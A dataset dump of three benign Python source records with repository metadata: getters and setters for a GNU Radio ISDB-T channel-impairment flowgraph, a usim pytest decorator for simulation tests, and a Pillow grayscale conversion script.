    """Return the QPSK constellation symbol table."""
    return self.symbol_table_QPSK

def set_symbol_table_QPSK(self, symbol_table_QPSK):
    """Store a new QPSK constellation symbol table."""
    self.symbol_table_QPSK = symbol_table_QPSK

def get_symbol_table_64QAM(self):
    """Return the 64-QAM constellation symbol table."""
    return self.symbol_table_64QAM

def set_symbol_table_64QAM(self, symbol_table_64QAM):
    """Store a new 64-QAM constellation symbol table."""
    self.symbol_table_64QAM = symbol_table_64QAM

def get_segments_c(self):
    """Return the number of segments assigned to layer C."""
    return self.segments_c

def set_segments_c(self, segments_c):
    """Store the layer-C segment count."""
    self.segments_c = segments_c

def get_segments_b(self):
    """Return the number of segments assigned to layer B."""
    return self.segments_b

def set_segments_b(self, segments_b):
    """Store the layer-B segment count."""
    self.segments_b = segments_b

def get_segments_a(self):
    """Return the number of segments assigned to layer A."""
    return self.segments_a

def set_segments_a(self, segments_a):
    """Store the layer-A segment count."""
    self.segments_a = segments_a
def get_phase_noise(self):
    """Return the simulated phase-noise magnitude."""
    return self.phase_noise

def set_phase_noise(self, phase_noise):
    """Update the phase-noise magnitude and push it to the impairments block."""
    self.phase_noise = phase_noise
    self.channels_impairments_0.set_phase_noise_mag(self.phase_noise)

def get_noise_volt(self):
    """Return the channel noise voltage."""
    return self.noise_volt

def set_noise_volt(self, noise_volt):
    """Update the noise voltage and push it to the channel model."""
    self.noise_volt = noise_volt
    self.channels_channel_model_0.set_noise_voltage(self.noise_volt)
def get_length_c(self):
    """Return the layer-C interleaving length."""
    return self.length_c

def set_length_c(self, length_c):
    """Store the layer-C interleaving length."""
    self.length_c = length_c

def get_length_b(self):
    """Return the layer-B interleaving length."""
    return self.length_b

def set_length_b(self, length_b):
    """Store the layer-B interleaving length."""
    self.length_b = length_b

def get_length_a(self):
    """Return the layer-A interleaving length."""
    return self.length_a

def set_length_a(self, length_a):
    """Store the layer-A interleaving length."""
    self.length_a = length_a

def get_guard(self):
    """Return the guard-interval fraction."""
    return self.guard

def set_guard(self, guard):
    """Store a new guard-interval fraction."""
    self.guard = guard
def get_frec_offset(self):
    """Return the simulated frequency offset."""
    return self.frec_offset

def set_frec_offset(self, frec_offset):
    """Update the frequency offset and push it to both the impairments
    block and the channel model."""
    self.frec_offset = frec_offset
    self.channels_impairments_0.set_freq_offset(self.frec_offset)
    self.channels_channel_model_0.set_frequency_offset(self.frec_offset)
def get_delay(self):
    """Return the channel delay (derived from the tap count in set_taps)."""
    return self.delay

def set_delay(self, delay):
    """Store a new channel delay value."""
    self.delay = delay

def get_data_carriers(self):
    """Return the number of data carriers (set by set_mode)."""
    return self.data_carriers

def set_data_carriers(self, data_carriers):
    """Store a new data-carrier count."""
    self.data_carriers = data_carriers
def get_bb_gain(self):
    """Return the baseband gain factor."""
    return self.bb_gain

def set_bb_gain(self, bb_gain):
    """Update the baseband gain and push it to the multiply-const block."""
    self.bb_gain = bb_gain
    self.blocks_multiply_const_xx_0.set_k(self.bb_gain)
def get_TOI(self):
    """Return the third-order intermodulation (TOI) setting."""
    return self.TOI

def set_TOI(self, TOI):
    """Update TOI and push it as beta to the impairments block."""
    self.TOI = TOI
    self.channels_impairments_0.set_beta(self.TOI)

def get_SOI(self):
    """Return the second-order intermodulation (SOI) setting."""
    return self.SOI

def set_SOI(self, SOI):
    """Update SOI and push it as gamma to the impairments block."""
    self.SOI = SOI
    self.channels_impairments_0.set_gamma(self.SOI)
def get_Quad_Offset(self):
    """Return the quadrature (Q) DC offset."""
    return self.Quad_Offset

def set_Quad_Offset(self, Quad_Offset):
    """Update the Q offset and push it to the impairments block."""
    self.Quad_Offset = Quad_Offset
    self.channels_impairments_0.set_q_ofs(self.Quad_Offset)

def get_Infase_Offset(self):
    """Return the in-phase (I) DC offset."""
    return self.Infase_Offset

def set_Infase_Offset(self, Infase_Offset):
    """Update the I offset and push it to the impairments block."""
    self.Infase_Offset = Infase_Offset
    self.channels_impairments_0.set_i_ofs(self.Infase_Offset)
def get_IQ_Phase_Imbalance(self):
    """Return the IQ phase-imbalance setting."""
    return self.IQ_Phase_Imbalance

def set_IQ_Phase_Imbalance(self, IQ_Phase_Imbalance):
    """Update the IQ phase imbalance and push it to the impairments block."""
    self.IQ_Phase_Imbalance = IQ_Phase_Imbalance
    self.channels_impairments_0.set_phasebal(self.IQ_Phase_Imbalance)

def get_IQ_Mag_Imbalance(self):
    """Return the IQ magnitude-imbalance setting."""
    return self.IQ_Mag_Imbalance

def set_IQ_Mag_Imbalance(self, IQ_Mag_Imbalance):
    """Update the IQ magnitude imbalance and push it to the impairments block."""
    self.IQ_Mag_Imbalance = IQ_Mag_Imbalance
    self.channels_impairments_0.set_magbal(self.IQ_Mag_Imbalance)
def get_AjusteMascara(self):
    """Return the mask-adjustment offset (AjusteMascara)."""
    return self.AjusteMascara

def set_AjusteMascara(self, AjusteMascara):
    """Update the mask-adjustment offset and push it to the three constant
    sources feeding the mask traces."""
    self.AjusteMascara = AjusteMascara
    self.analog_const_source_x_0_0_0.set_offset(self.AjusteMascara)
    self.analog_const_source_x_0_0.set_offset(self.AjusteMascara)
    self.analog_const_source_x_0.set_offset(self.AjusteMascara)
def main(top_block_cls=top_block, options=None):
    """Qt entry point: instantiate the flowgraph, run it, and make sure the
    flowgraph is stopped before the Qt application tears down."""
    qapp = Qt.QApplication(sys.argv)
    tb = top_block_cls()
    tb.start()
    tb.show()

    def quitting():
        # Stop and join the flowgraph before the widgets are destroyed.
        tb.stop()
        tb.wait()

    qapp.aboutToQuit.connect(quitting)
    qapp.exec_()


if __name__ == '__main__':
    main()
| [
"noreply@github.com"
] | noreply@github.com |
c3130eff5ead53a74d10c68261d2e3559dfc4623 | 91ab6e48d02822bd957e210484fceff4ce0b7d61 | /usim_pytest/test_usimpy/utility.py | 07f6c368aa6577c5ef2802885d34f46f00ad824f | [
"MIT"
] | permissive | MaineKuehn/usim | d203c78f2f644f546b932d1da40b50f26403d053 | 28615825fbe23140bbf9efe63fb18410f9453441 | refs/heads/master | 2021-09-25T08:05:03.015523 | 2021-09-17T13:42:39 | 2021-09-17T13:42:39 | 177,617,781 | 18 | 3 | MIT | 2021-09-17T13:42:40 | 2019-03-25T15:50:34 | Python | UTF-8 | Python | false | false | 1,097 | py | from functools import wraps
from typing import Callable, Generator
from ..utility import UnfinishedTest
def via_usimpy(test_case: Callable[..., Generator]):
    """
    Decorator marking a generator-function test case to be run via a
    ``usim.py.Environment``

    .. code:: python3

        @via_usimpy
        def test_sleep(env):
            before = env.now
            yield env.timeout(20)
            after = env.now
            assert after - before == 20

    Note that ``env`` is passed in as a keyword argument.
    """
    @wraps(test_case)
    def run_test(self=None, env=None, **kwargs):
        completed = False
        if self is not None:
            kwargs['self'] = self

        def complete_test_case():
            # Drive the wrapped generator; flag completion so tests cut
            # short by the simulation ending early are detected below.
            __tracebackhide__ = True
            nonlocal completed
            yield from test_case(env=env, **kwargs)
            completed = True

        __tracebackhide__ = True
        env.process(complete_test_case())
        result = env.run()
        if not completed:
            raise UnfinishedTest(test_case)
        return result

    return run_test
| [
"maxfischer2781@gmail.com"
] | maxfischer2781@gmail.com |
381480860df458c87e5cf101bb9259c71ffeca3f | 8951d78a98ced3e61c465814bc19185c2fa983f9 | /23. pip(external_package)/03. pillow/imageProcessing3.py | beaa26c21358943f6bfed897bc89b0b9213b2cf2 | [] | no_license | yusuke-hi-rei/python | 0f14a70c5d701a691fa797275d5a8ee08ff51e0e | 41abaea22c5d17395a397cbd6d6d34dae62808e3 | refs/heads/master | 2022-04-15T12:12:06.165098 | 2020-04-11T16:35:26 | 2020-04-11T16:35:26 | 254,903,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | ## Convert to monochrome.
## Convert to monochrome.
from PIL import Image

# Exception handling is performed assuming that the image file may fail
# to open (missing file, unreadable format, ...).
try:
    # Use a context manager so the underlying file handle is always
    # closed, instead of relying on garbage collection.
    with Image.open("image.jpg", "r") as img1:
        # "L": 8-bit grayscale.
        img2 = img1.convert("L")
        img2.save("image_saved3.jpg", "JPEG")
    print("saved...")
except IOError as error:
    print(error)
| [
"yultutin01@yahoo.co.jp"
] | yultutin01@yahoo.co.jp |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.